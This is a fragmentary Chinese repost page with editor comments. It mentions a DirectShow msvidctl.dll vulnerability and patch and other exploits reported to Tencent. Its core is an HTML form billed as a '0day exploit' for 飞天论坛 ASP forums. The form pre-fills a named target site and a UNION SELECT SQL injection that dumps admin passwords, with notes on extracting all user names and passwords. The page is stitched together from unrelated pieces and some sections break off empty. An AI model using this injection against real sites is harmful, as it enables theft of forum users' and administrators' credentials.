【白银时代】备注：我孤陋寡闻了，都出了快半个月了……

该文章出自《Peerless (皮尔利斯)》,原文链接：http://www.xumus.com/read.php/80.htm
...

【白银时代】备注：不安全哪……

补丁的原理并不复杂，禁用了所利用的Microsoft DirectShow(msvidctl.dll)的CLSID: 0955AC62-BF2E-4CBA-A2B9-A63F772D46CF。可有效防止该漏洞，对您的系统进行破坏。

360上面好像出补丁了，我没去看过，我打了个其他地方找的补丁。

【白银时代】备注：即使360出了个临时补丁，也有必要看看是咋回事。

作者：tombkeeper

以下主要是写给订阅这个blog的非信息安全专业人士看的，同行们可以忽略。

【白银时代】备注：不要乱来，今年抓的蛮严的……

Copy code<center><H1>飞天论坛asp版通杀 0day利用程序</H1></center>
<form  method=post name="luoye">
目标地址：<input name="act" type="text" id="act" size="140" value="http://bbs.0127.cn/"><br><br>
注入语句：<input type=text size=150 name=userid value="1 and 1=2 union select 1,2,admin_pwd,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37

,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from ftbbs_admin"><br><br>
<input type=submit value=Fuck onClick="javascript:luoye.action=document.all.act.value+'haoyou.asp';">

<br><br><br><br>
<font color=red>爆所有管理员用户名时，把admin_pwd改为admin_user</font><br><br>
<font color=red>爆所有论坛用户数据时，把表名改为clubuser，用户名字段是clubuser_nickname；密码字段是clubuser_password</font><br><br>
<font color=red>如果想爆单一用户或管理员的数据，请自行加where语句，参考：id、clubuserid</font><br><br>

【白银时代】备注：作者已通知腾讯……SO，大家没搞头啦……嘎嘎。
作者:孤鸿影

漏洞一:

【白银时代】备注：该软件具有攻击性，易对网络造成威胁，请使用者自行承担使用后果，本文仅做转载。
                          PS：作者说测试可用，但是我虚拟机跑了一下没能溢出，难道这个EXP需要人品？...